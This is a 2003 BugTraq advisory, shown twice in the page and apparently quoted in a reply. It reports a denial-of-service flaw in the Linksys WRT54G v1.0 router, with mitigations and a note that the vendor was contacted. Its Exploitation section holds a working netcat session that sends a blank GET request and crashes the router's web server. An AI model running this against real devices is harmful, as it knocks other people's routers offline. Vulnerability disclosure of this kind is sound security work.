BugTraq
Back to list
|
Post reply
Linksys WRT54G Denial of Service Vulnerability
Dec 03 2003 10:35PM
test techcentric net
(1 replies)
Linksys WRT54G Denial of Service Vulnerability
System(s)
===========
Tested on Linksys WRT54G v1.0 (firmware v 1.42.3)
Detail(s)
===========
Sending a blank GET request to the router on port 80 (or 8080) halts the embedded webserver. This may allow an attacker to force the owner to reboot the router, allowing them to gain sensitive information during router authentication.
Exploitation
============
user@test:~$ nc 10.0.0.1 80
GET
user@test:~$ nc 10.0.0.1 80
(UNKNOWN) [10.0.0.1] 80 (http) : Connection refused
user@test:~$
Solution(s)
============
- Https service should continue running for remote access.
- Scan for sniffers that might be on the network before rebooting and performing any authentication.
- Wait for a vendor patch :)
Status
============
Vendor contacted on 12/03/03.
!HAPPY HOLIDAYS!
carbon (at) techcentric (dot) net [email concealed] - 12/02/03
[ reply ]
Re: Linksys WRT54G Denial of Service Vulnerability
Dec 04 2003 04:33AM
Michael Renzmann (security dylanic de)
Privacy Statement
Copyright 2010, SecurityFocus
Linksys WRT54G Denial of Service Vulnerability
System(s)
===========
Tested on Linksys WRT54G v1.0 (firmware v 1.42.3)
Detail(s)
===========
Sending a blank GET request to the router on port 80 (or 8080) halts the embedded webserver. This may allow an attacker to force the owner to reboot the router, allowing them to gain sensitive information during router authentication.
Exploitation
============
user@test:~$ nc 10.0.0.1 80
GET
user@test:~$ nc 10.0.0.1 80
(UNKNOWN) [10.0.0.1] 80 (http) : Connection refused
user@test:~$
Solution(s)
============
- Https service should continue running for remote access.
- Scan for sniffers that might be on the network before rebooting and performing any authentication.
- Wait for a vendor patch :)
Status
============
Vendor contacted on 12/03/03.
!HAPPY HOLIDAYS!
carbon (at) techcentric (dot) net [email concealed] - 12/02/03
[ reply ]